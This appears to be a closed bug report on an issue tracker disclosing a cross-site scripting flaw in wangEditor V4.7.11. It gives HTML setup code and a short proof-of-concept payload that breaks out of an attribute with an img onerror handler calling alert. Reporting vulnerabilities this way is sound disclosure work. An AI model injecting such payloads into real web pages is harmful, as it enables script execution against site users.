Closed
Description
bug
XSS vulnerability
wangEditor version
V4.7.11
Can the official website reproduce the loopholes ?
yes
Reproduction steps
1.Use the following code to build the environment or on the official demo website(https://codepen.io/xiaokyo-the-bold/pen/ZEpWByR)
<script type="text/javascript" src="https://unpkg.com/wangeditor/dist/wangEditor.min.js"></script>
<span class="col-lg-8" id="editor"></span>
<script type="text/javascript">
const E = window.wangEditor
const editor = new E('#editor')
editor.create()
</script>
2.Visit this HTML page and do the following
poyload:
"><img src=1 onerror=alert(/xss/)>

